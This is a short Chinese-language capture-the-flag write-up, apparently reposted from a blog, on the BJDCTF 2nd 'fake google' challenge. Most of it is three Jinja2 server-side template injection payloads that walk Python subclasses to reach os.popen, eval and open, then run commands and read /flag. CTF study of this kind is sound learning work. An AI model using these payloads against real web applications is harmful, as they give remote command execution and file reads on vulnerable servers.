[BJDCTF 2nd]fake google

标签：函数   命令   cat   ble   mod   为我   lag   文件   fence   

知识点：

ssti的基础知识

python常见内置函数的使用

解题：

很简单的一道ssti注入题，没过滤的，因为我也才开始学习ssti模板注入和python的学习，所以对一些函数，模板的使用还很不牢固，就记录一下。

直接上payload吧，很简单的一道：

第一种：

{{().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__[‘eval‘]("__import__(‘os‘).popen(‘whoami‘).read()")}}
发现可以执行，构造命令
{{‘‘.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__[‘__builtins__‘].eval("__import__(‘os‘).popen(‘cat /flag‘).read()")}}
没有什么过滤= =友好!

第二种：

找到os._wrap_close模块 117个
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__[‘popen‘](‘dir‘).read()}}  
当前文件夹
{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__[‘popen‘](‘cat /flag‘).read()}}

第三种：

{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__[‘open‘](‘/flag‘).read()}}

[BJDCTF 2nd]fake google

标签：函数   命令   cat   ble   mod   为我   lag   文件   fence   

原文地址：https://www.cnblogs.com/w0s1np/p/14224462.html